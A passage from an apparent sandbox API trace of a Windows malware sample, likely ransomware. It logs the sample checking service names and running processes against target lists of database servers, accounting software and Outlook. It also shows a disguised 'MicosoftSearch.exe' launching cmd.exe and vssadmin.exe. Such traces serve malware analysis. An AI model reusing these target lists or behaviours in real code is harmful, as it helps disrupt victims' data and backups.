(lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0048.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0048.309] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0048.309] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0048.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0048.309] lstrlenW (lpString="Themes") returned 6 [0048.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0048.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0048.309] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0048.309] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0048.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0048.309] lstrlenW (lpString="TrkWks") returned 6 [0048.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0048.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0048.309] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0048.309] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0048.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0048.309] lstrlenW (lpString="UxSms") returned 5 [0048.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0048.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0048.309] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0048.310] lstrlenW (lpString="VSS") returned 3 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0048.310] lstrlenW (lpString="WdiServiceHost") returned 14 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0048.310] lstrlenW (lpString="WdiSystemHost") returned 13 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0048.310] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0048.310] lstrlenW (lpString="Winmgmt") returned 7 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0048.310] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0048.310] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0048.310] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0048.310] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0048.310] lstrlenW (lpString="WPDBusEnum") returned 10 [0048.310] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.311] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.311] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0048.311] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0048.311] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0048.311] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0048.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4 [0048.313] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0048.314] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0048.315] lstrlenW (lpString="System") returned 6 [0048.315] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0048.315] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0048.315] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0048.315] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0048.315] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0048.315] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0048.315] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0048.315] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0048.316] lstrlenW (lpString="smss.exe") returned 8 [0048.316] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0048.316] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0048.316] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0048.316] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0048.316] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0048.316] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0048.316] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0048.316] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.317] lstrlenW (lpString="csrss.exe") returned 9 [0048.317] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0048.317] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0048.317] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0048.317] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0048.317] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0048.317] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0048.317] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0048.317] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0048.317] lstrlenW (lpString="wininit.exe") returned 11 [0048.317] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0048.317] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0048.318] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0048.318] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.318] lstrlenW (lpString="csrss.exe") returned 9 [0048.319] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0048.319] lstrlenW (lpString="winlogon.exe") returned 12 [0048.319] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0048.320] lstrlenW (lpString="services.exe") returned 12 [0048.320] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0048.321] lstrlenW (lpString="lsass.exe") returned 9 [0048.321] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0048.321] lstrlenW (lpString="lsm.exe") returned 7 [0048.322] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.322] lstrlenW (lpString="svchost.exe") returned 11 [0048.322] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.323] lstrlenW (lpString="svchost.exe") returned 11 [0048.323] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.324] lstrlenW (lpString="svchost.exe") returned 11 [0048.324] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.324] lstrlenW (lpString="svchost.exe") returned 11 [0048.325] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.325] lstrlenW (lpString="svchost.exe") returned 11 [0048.325] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0048.326] lstrlenW (lpString="audiodg.exe") returned 11 [0048.326] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.327] lstrlenW (lpString="svchost.exe") returned 11 [0048.327] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.328] lstrlenW (lpString="svchost.exe") returned 11 [0048.328] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0048.328] lstrlenW (lpString="dwm.exe") returned 7 [0048.328] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0048.329] lstrlenW (lpString="explorer.exe") returned 12 [0048.329] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0048.330] lstrlenW (lpString="spoolsv.exe") returned 11 [0048.330] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.331] lstrlenW (lpString="taskhost.exe") returned 12 [0048.331] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.332] lstrlenW (lpString="svchost.exe") returned 11 [0048.332] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0048.332] lstrlenW (lpString="taskeng.exe") returned 11 [0048.333] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.333] lstrlenW (lpString="taskhost.exe") returned 12 [0048.333] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0048.334] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0048.334] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0048.335] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0048.335] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0048.335] lstrlenW (lpString="sa_shape.exe") returned 12 [0048.336] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0048.336] lstrlenW (lpString="confidence.exe") returned 14 [0048.336] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0048.337] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0048.337] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0048.338] lstrlenW (lpString="blue.exe") returned 8 [0048.338] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0048.338] lstrlenW (lpString="newly debut.exe") returned 15 [0048.338] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0048.693] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0048.696] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0048.703] lstrlenW (lpString="archive.exe") returned 11 [0048.705] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0048.720] lstrlenW (lpString="defend.exe") returned 10 [0048.721] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0048.728] lstrlenW (lpString="arservice.exe") returned 13 [0048.732] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0048.733] lstrlenW (lpString="rr-programmer.exe") returned 17 [0048.733] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0048.733] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0048.733] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0048.734] lstrlenW (lpString="twistedmonton.exe") returned 17 [0048.734] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0048.735] lstrlenW (lpString="arc plains.exe") returned 14 [0048.735] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0048.736] lstrlenW (lpString="americahousestip.exe") returned 20 [0048.736] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0048.737] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0048.737] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0048.738] lstrlenW (lpString="medical lectures.exe") returned 20 [0048.738] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0048.738] lstrlenW (lpString="electronic.exe") returned 14 [0048.739] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0048.739] lstrlenW (lpString="regression.exe") returned 14 [0048.739] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0048.740] lstrlenW (lpString="county.exe") returned 10 [0048.740] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.741] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0048.741] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0048.742] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0048.742] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.742] lstrlenW (lpString="cmd.exe") returned 7 [0048.742] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.743] lstrlenW (lpString="conhost.exe") returned 11 [0048.743] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0048.744] lstrlenW (lpString="vssadmin.exe") returned 12 [0048.744] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0048.745] lstrlenW (lpString="VSSVC.exe") returned 9 [0048.745] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.745] lstrlenW (lpString="svchost.exe") returned 11 [0048.746] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: 